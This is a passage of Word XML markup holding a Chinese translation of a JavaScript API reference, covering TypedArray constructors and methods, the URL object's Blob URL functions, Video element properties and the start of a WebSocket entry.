        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每个数组元素一个字节，解释为一个无符号整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Uint16Array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每个数组元素两个字节，解释为一个无符号整数，使用平台字节顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Uint32Array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每个数组元素</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节，解释为一个无符号整数，使用平台字节顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Float32Array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每个数组元素</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节，解释为一个浮点数，使用平台字节顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Float64Array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每个数组元素</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>个字节，解释为一个浮点数，使用平台字节顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>就像名字所暗示的，这些都是类数组对象，可以通过普通的方括号数组记号来存取元素。不过要注意，这些类型的对象总是固定长度的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意上面的描述，</w:t>
      </w:r>
      <w:r>
        <w:t>TypedArray</w:t>
      </w:r>
      <w:r>
        <w:t>类型使用底层平台的默认字节顺序。关于可以显式控制字节顺序的</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>视图请参见</w:t>
      </w:r>
      <w:r>
        <w:t>DataView</w:t>
      </w:r>
      <w:r>
        <w:t>。</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TypedArray(unsigned long length)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new Ty</w:t>
      </w:r>
      <w:r>
        <w:t>pedArray(TypedArray array)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new TypedArray(type[]array)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new TypedArray(ArrayBuffer buffer,[unsigned long byteOffset],[unsigned long length])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>种</w:t>
      </w:r>
      <w:r>
        <w:t>TypedArray</w:t>
      </w:r>
      <w:r>
        <w:t>的构造函数都可以用上面</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>种方式调用。构造函数如下工作：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果以一个单独的数字参数调用构造函数，它将创建一个新的具有指定数目的元素的类型化数组，每个元素将初始化为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果传入一个类型化数组对象，则这个构</w:t>
      </w:r>
      <w:r>
        <w:t>造函数将创建一个新的类型化数组，其元素的数目与参数数组元素的数目一致，然后将参数数组的元素复制到新创建的数组中。参数数组的类型可与和创建的数组的类型不同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果传入一个数组（真实的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组），则构造函数将创建一个新的类型化数组，其元素数目与参数数组元素的数目一致，然后将参数数组的元素值复制到新数组中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>最后，如果传入一个</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>对象以及可选的偏移和长度参数，则构造函数将创建一个新的类型化数组，这个数组将是指定</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>的指定区域的一个视图。新的</w:t>
      </w:r>
      <w:r>
        <w:t>TypedArra</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>的长度取决于</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>区域以及类型化数组的元素尺寸。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>long BYTES_PER_ELEMENT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当前数组的每个元素在基本的</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>中占用的字节数。这个常量的值可能为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>，取决于使用了哪种类型的</w:t>
      </w:r>
      <w:r>
        <w:t>TypedArray</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数组中元素的数目。</w:t>
      </w:r>
      <w:r>
        <w:t>TypedArray</w:t>
      </w:r>
      <w:r>
        <w:t>具有固定长度，这个属性的值永远不会改变。注意，这个属性一般来说不等于继承自</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBufferView</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void set(TypedArray array,[unsigned long offset])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从索引</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t>处开始，复制</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的元素到当前类型化数组中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void set(number[]array,[unsigned long offset])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个版本的</w:t>
      </w:r>
      <w:r>
        <w:t>set()</w:t>
      </w:r>
      <w:r>
        <w:t>和上面一个类似，不过它使用的是真实的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组，而不是类型化数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>TypedArray subarray(long start,long end)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回一个和当前</w:t>
      </w:r>
      <w:r>
        <w:t>TypedArray</w:t>
      </w:r>
      <w:r>
        <w:t>使用同一个基本</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBu</w:t>
      </w:r>
      <w:r>
        <w:t>ffer</w:t>
      </w:r>
      <w:r>
        <w:t>的新</w:t>
      </w:r>
      <w:r>
        <w:t>TypedArray</w:t>
      </w:r>
      <w:r>
        <w:t>。返回的数组的第一个元素是当前数组的</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>位置处的元素，同时返回的数组的最后一个元素是当前数组的</w:t>
      </w:r>
      <w:r>
        <w:t>end-1</w:t>
      </w:r>
      <w:r>
        <w:t>位置处的元素。如果</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:t>为负数，则偏移量将从当前数组的尾部开始计算。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="881" w:name="URL"/>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="881"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>属性指代这个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>对象。将来这个对象可能会变成一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>解析及操作工具类的构造函数。不过，在写作本书的时候，它还只是为下面描述的两个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>方法提供一个命名空间。更多关于</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>的内容请参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.6</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>22.</w:t>
      </w:r>
      <w:r>
        <w:t>6.4</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在写作本书的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>对象还很新，它的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>还没有稳定。可能需要带上厂商定义的前缀来使用它，比如</w:t>
      </w:r>
      <w:r>
        <w:t>webkitURL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string createObjectURL(Blob blob)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>根据指定的</w:t>
      </w:r>
      <w:r>
        <w:t>blob</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>。对这个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求将返回对应的</w:t>
      </w:r>
      <w:r>
        <w:t>blob</w:t>
      </w:r>
      <w:r>
        <w:t>的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>void revokeObjectURL(string url)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>撤销指定的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob url</w:t>
      </w:r>
      <w:r>
        <w:t>，之后它将不再与任何</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>关联，也不可以再加载。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="882" w:name="Video"/>
      <w:r>
        <w:t>Video</w:t>
      </w:r>
      <w:bookmarkEnd w:id="882"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>lement</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>MediaElement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Video</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素非常类似，它们共同的属性和方法的文档位于</w:t>
      </w:r>
      <w:r>
        <w:t>MediaElement</w:t>
      </w:r>
      <w:r>
        <w:t>部分。这儿是</w:t>
      </w:r>
      <w:r>
        <w:t>Video</w:t>
      </w:r>
      <w:r>
        <w:t>对象专有的一些属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DOMSettableTokenList audio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性指定当前视频的音频选项。对应的选项在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML audio</w:t>
      </w:r>
      <w:r>
        <w:t>属性中以空格分隔的标记列表定义，这个集合在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中映射为一个</w:t>
      </w:r>
      <w:r>
        <w:t>DOMSettableTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>。不过，在写作本书的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准还只定</w:t>
      </w:r>
      <w:r>
        <w:t>义了一个合法标记（</w:t>
      </w:r>
      <w:r>
        <w:t>"muted"</w:t>
      </w:r>
      <w:r>
        <w:t>），因此，可以将这个属性当做一个字符串处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>unsigned long height</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素在屏幕上的高度，单位为</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素。对应</w:t>
      </w:r>
      <w:r>
        <w:t>HTML height</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string poster</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在视频开始播放之前显示为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>海报帧</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的图片的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。对应</w:t>
      </w:r>
      <w:r>
        <w:t>HTML poster</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long videoHeight</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long videoWidth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这两个属性返回当前视频的原始高度和宽度（即，它的帧的尺寸），单位为</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素。在＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素加载视频的元数据（</w:t>
      </w:r>
      <w:r>
        <w:t>metadata</w:t>
      </w:r>
      <w:r>
        <w:t>）之前（</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>仍旧是</w:t>
      </w:r>
      <w:r>
        <w:t>HAVE_NOTHING</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>loadedmetadata</w:t>
      </w:r>
      <w:r>
        <w:t>事件还没有被分发），这两个属性都为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned long width</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素在屏幕上的宽度，单位为</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素。对应</w:t>
      </w:r>
      <w:r>
        <w:t>HTML width</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="883" w:name="WebSocket"/>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:bookmarkEnd w:id="883"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一个双向的类套接字的网络连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
